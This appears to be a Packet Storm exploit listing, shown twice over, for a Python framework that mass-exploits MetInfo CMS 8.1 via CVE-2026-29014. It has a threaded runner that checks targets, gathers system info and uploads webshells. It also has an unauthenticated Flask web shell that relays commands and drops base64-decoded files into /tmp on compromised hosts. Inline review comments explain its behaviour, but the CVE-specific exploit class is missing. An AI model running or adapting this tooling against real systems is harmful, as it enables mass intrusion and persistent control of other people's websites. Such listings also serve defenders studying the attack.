9.8
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014...
Basic Information
ID
PACKETSTORM:219759
Published
Apr 24, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : MetInfo CMS 8.1 Mass Exploitation & Web Shell Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.metinfo.cn |
==================================================================================================================================
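[+] Summary : This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014. The listing below contains only the multi-target runner and an operator-side web interface; the CVE-specific request logic is expected from an externally supplied exploit class that is not included here, and the code's indentation was lost when the page was extracted.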
[+] POC :
#!/usr/bin/env python3
import threading
import queue
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
# Review note (defensive reading): this class is an orchestration wrapper only.
# It reads a list of URLs, runs a caller-supplied exploit class against each one
# from a thread pool, and collects the outcomes. The CVE-specific logic is not in
# this listing: exploit_class defaults to None and has to come from elsewhere.
# Indentation was lost in extraction, so the text is not runnable as shown.
class MetInfoMassExploit:
"""Mass exploitation for multiple targets"""
def __init__(self, targets_file, threads=10, output_file=None, exploit_class=None):
# The targets file is read immediately. exploit_class is the external class
# instantiated once per target in exploit_single().
self.targets = self.load_targets(targets_file)
self.threads = threads
self.output_file = output_file
self.results = []
# Serialises appends to self.results and console output across worker threads.
self.lock = threading.Lock()
self.exploit_class = exploit_class
def load_targets(self, file_path):
"""Load targets from file"""
# One entry per line; blank lines and lines starting with '#' are skipped.
# Entries are not checked to be well-formed URLs.
targets = []
with open(file_path, 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
targets.append(line)
return targets
def exploit_single(self, target_url):
"""Exploit a single target"""
# Returns the result dict when the external class reports the target as
# vulnerable, otherwise None.
try:
# With no exploit_class this returns before anything is logged, so the
# target never appears in self.results.
if not self.exploit_class:
return None
# check_vulnerability(), get_system_info() and upload_webshell() belong to
# the external exploit class; their behaviour is not visible in this listing.
exploit = self.exploit_class(target_url, verbose=False)
if exploit.check_vulnerability():
result = {
'url': target_url,
'vulnerable': True
}
if hasattr(exploit, "get_system_info"):
try:
result['info'] = exploit.get_system_info()
# Bare except: every failure, including BaseException subclasses, is discarded.
except:
result['info'] = None
if hasattr(exploit, "upload_webshell"):
try:
webshell = exploit.upload_webshell()
if webshell:
result['webshell'] = webshell
# Bare except: a failure here leaves no trace in the recorded result.
except:
pass
self.log_result(result)
return result
else:
self.log_result({'url': target_url, 'vulnerable': False})
return None
# NOTE(review): any exception raised above is recorded as 'vulnerable': False
# with an 'error' field, and log_result() prints it as "Not vulnerable". A
# negative line from this tool is therefore not evidence that a host is patched.
except Exception as e:
self.log_result({
'url': target_url,
'vulnerable': False,
'error': str(e)
})
return None
def log_result(self, result):
"""Log result with thread safety"""
# Incident-response note: each result, including any 'webshell' value returned
# by the external class (presumably the location of a dropped file - not
# confirmable from this listing), is printed to stdout and kept in
# self.results, which run() can write to the output file as JSON. Those are
# operator-side artifacts.
with self.lock:
self.results.append(result)
if result.get('vulnerable'):
print(f"[+] VULNERABLE: {result.get('url')}")
if result.get('webshell'):
print(f" Webshell: {result.get('webshell')}")
else:
print(f"[-] Not vulnerable: {result.get('url')}")
def run(self):
"""Run mass exploitation"""
print(f"[*] Loaded {len(self.targets)} targets")
print(f"[*] Using {self.threads} threads")
# Every target is submitted up front; max_workers bounds the concurrency.
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = [
executor.submit(self.exploit_single, url)
for url in self.targets
]
for future in as_completed(futures):
# exploit_single() already catches Exception itself, so this handler is a
# second layer that also discards whatever reaches it.
try:
future.result()
except Exception:
pass
if self.output_file:
with open(self.output_file, 'w') as f:
json.dump(self.results, f, indent=2)
print(f"[*] Results saved to {self.output_file}")
# The denominator is the number of targets loaded, not the number that produced
# a logged result.
vulnerable_count = sum(1 for r in self.results if r.get('vulnerable'))
print(f"\n[*] Summary: {vulnerable_count}/{len(self.targets)} targets vulnerable")
# Review note (defensive reading): operator-side Flask front end. It does not
# contact the target itself; every action is relayed through execute_command() of
# the exploit instance handed to __init__, which is not part of this listing.
# Indentation was lost in extraction, so the text is not runnable as shown.
class MetInfoWebShell:
"""Web-based shell interface using Flask"""
def __init__(self, exploit_instance):
self.exploit = exploit_instance
# Set to the Flask application object once start() has built it.
self.app = None
def start(self, host='0.0.0.0', port=8080):
"""Start web shell server"""
# The defaults bind to all interfaces on port 8080 and the route below performs
# no authentication, so any client that can reach the port can relay commands
# through self.exploit.
try:
from flask import Flask, request, render_template_string
import base64 # FIX: missing import
app = Flask(__name__)
TEMPLATE = '''
<html>
<body>
<h2>MetInfo Web Shell</h2>
<form method="post">
<input type="text" name="cmd">
<input type="submit">
</form>
{% if output %}
<pre>{{ output }}</pre>
{% endif %}
</body>
</html>
'''
@app.route('/', methods=['GET', 'POST'])
def index():
output = ""
if request.method == 'POST':
if 'cmd' in request.form:
# The submitted string is handed unchanged to the external execute_command().
cmd = request.form['cmd']
output = self.exploit.execute_command(cmd) or ""
elif 'file' in request.files:
file = request.files['file']
if file and file.filename:
content = file.read()
b64_content = base64.b64encode(content).decode()
remote_path = f"/tmp/{file.filename}"
# Detection note: this branch asks the target to run
# `echo '<base64>' | base64 -d > /tmp/<filename>`. Assuming execute_command()
# runs the string in a shell on the target (not visible here), that would
# appear on a compromised host as the web server's process spawning a shell
# that pipes into base64 -d, followed by a new file under /tmp.
self.exploit.execute_command(
f"echo '{b64_content}' | base64 -d > {remote_path}"
)
output = f"Uploaded to {remote_path}"
return render_template_string(TEMPLATE, output=output)
self.app = app
print(f"[*] Web shell started at http://{host}:{port}")
app.run(host=host, port=port)
# Only a missing Flask install is handled; other errors propagate to the caller.
except ImportError:
print("[-] Flask not installed")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : MetInfo CMS 8.1 Mass Exploitation & Web Shell Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.metinfo.cn |
==================================================================================================================================
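[+] Summary : This Python module is a mass exploitation framework designed to automate the testing and exploitation of multiple MetInfo CMS targets potentially affected by CVE-2026-29014. The listing below contains only the multi-target runner and an operator-side web interface; the CVE-specific request logic is expected from an externally supplied exploit class that is not included here, and the code's indentation was lost when the page was extracted.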
[+] POC :
#!/usr/bin/env python3
import threading
import queue
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
# Review note (defensive reading): this class is an orchestration wrapper only.
# It reads a list of URLs, runs a caller-supplied exploit class against each one
# from a thread pool, and collects the outcomes. The CVE-specific logic is not in
# this listing: exploit_class defaults to None and has to come from elsewhere.
# Indentation was lost in extraction, so the text is not runnable as shown.
class MetInfoMassExploit:
"""Mass exploitation for multiple targets"""
def __init__(self, targets_file, threads=10, output_file=None, exploit_class=None):
# The targets file is read immediately. exploit_class is the external class
# instantiated once per target in exploit_single().
self.targets = self.load_targets(targets_file)
self.threads = threads
self.output_file = output_file
self.results = []
# Serialises appends to self.results and console output across worker threads.
self.lock = threading.Lock()
self.exploit_class = exploit_class
def load_targets(self, file_path):
"""Load targets from file"""
# One entry per line; blank lines and lines starting with '#' are skipped.
# Entries are not checked to be well-formed URLs.
targets = []
with open(file_path, 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
targets.append(line)
return targets
def exploit_single(self, target_url):
"""Exploit a single target"""
# Returns the result dict when the external class reports the target as
# vulnerable, otherwise None.
try:
# With no exploit_class this returns before anything is logged, so the
# target never appears in self.results.
if not self.exploit_class:
return None
# check_vulnerability(), get_system_info() and upload_webshell() belong to
# the external exploit class; their behaviour is not visible in this listing.
exploit = self.exploit_class(target_url, verbose=False)
if exploit.check_vulnerability():
result = {
'url': target_url,
'vulnerable': True
}
if hasattr(exploit, "get_system_info"):
try:
result['info'] = exploit.get_system_info()
# Bare except: every failure, including BaseException subclasses, is discarded.
except:
result['info'] = None
if hasattr(exploit, "upload_webshell"):
try:
webshell = exploit.upload_webshell()
if webshell:
result['webshell'] = webshell
# Bare except: a failure here leaves no trace in the recorded result.
except:
pass
self.log_result(result)
return result
else:
self.log_result({'url': target_url, 'vulnerable': False})
return None
# NOTE(review): any exception raised above is recorded as 'vulnerable': False
# with an 'error' field, and log_result() prints it as "Not vulnerable". A
# negative line from this tool is therefore not evidence that a host is patched.
except Exception as e:
self.log_result({
'url': target_url,
'vulnerable': False,
'error': str(e)
})
return None
def log_result(self, result):
"""Log result with thread safety"""
# Incident-response note: each result, including any 'webshell' value returned
# by the external class (presumably the location of a dropped file - not
# confirmable from this listing), is printed to stdout and kept in
# self.results, which run() can write to the output file as JSON. Those are
# operator-side artifacts.
with self.lock:
self.results.append(result)
if result.get('vulnerable'):
print(f"[+] VULNERABLE: {result.get('url')}")
if result.get('webshell'):
print(f" Webshell: {result.get('webshell')}")
else:
print(f"[-] Not vulnerable: {result.get('url')}")
def run(self):
"""Run mass exploitation"""
print(f"[*] Loaded {len(self.targets)} targets")
print(f"[*] Using {self.threads} threads")
# Every target is submitted up front; max_workers bounds the concurrency.
with ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = [
executor.submit(self.exploit_single, url)
for url in self.targets
]
for future in as_completed(futures):
# exploit_single() already catches Exception itself, so this handler is a
# second layer that also discards whatever reaches it.
try:
future.result()
except Exception:
pass
if self.output_file:
with open(self.output_file, 'w') as f:
json.dump(self.results, f, indent=2)
print(f"[*] Results saved to {self.output_file}")
# The denominator is the number of targets loaded, not the number that produced
# a logged result.
vulnerable_count = sum(1 for r in self.results if r.get('vulnerable'))
print(f"\n[*] Summary: {vulnerable_count}/{len(self.targets)} targets vulnerable")
# Review note (defensive reading): operator-side Flask front end. It does not
# contact the target itself; every action is relayed through execute_command() of
# the exploit instance handed to __init__, which is not part of this listing.
# Indentation was lost in extraction, so the text is not runnable as shown.
class MetInfoWebShell:
"""Web-based shell interface using Flask"""
def __init__(self, exploit_instance):
self.exploit = exploit_instance
# Set to the Flask application object once start() has built it.
self.app = None
def start(self, host='0.0.0.0', port=8080):
"""Start web shell server"""
# The defaults bind to all interfaces on port 8080 and the route below performs
# no authentication, so any client that can reach the port can relay commands
# through self.exploit.
try:
from flask import Flask, request, render_template_string
import base64 # FIX: missing import
app = Flask(__name__)
TEMPLATE = '''
<html>
<body>
<h2>MetInfo Web Shell</h2>
<form method="post">
<input type="text" name="cmd">
<input type="submit">
</form>
{% if output %}
<pre>{{ output }}</pre>
{% endif %}
</body>
</html>
'''
@app.route('/', methods=['GET', 'POST'])
def index():
output = ""
if request.method == 'POST':
if 'cmd' in request.form:
# The submitted string is handed unchanged to the external execute_command().
cmd = request.form['cmd']
output = self.exploit.execute_command(cmd) or ""
elif 'file' in request.files:
file = request.files['file']
if file and file.filename:
content = file.read()
b64_content = base64.b64encode(content).decode()
remote_path = f"/tmp/{file.filename}"
# Detection note: this branch asks the target to run
# `echo '<base64>' | base64 -d > /tmp/<filename>`. Assuming execute_command()
# runs the string in a shell on the target (not visible here), that would
# appear on a compromised host as the web server's process spawning a shell
# that pipes into base64 -d, followed by a new file under /tmp.
self.exploit.execute_command(
f"echo '{b64_content}' | base64 -d > {remote_path}"
)
output = f"Uploaded to {remote_path}"
return render_template_string(TEMPLATE, output=output)
self.app = app
print(f"[*] Web shell started at http://{host}:{port}")
app.run(host=host, port=port)
# Only a missing Flask install is handled; other errors propagate to the caller.
except ImportError:
print("[-] Flask not installed")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================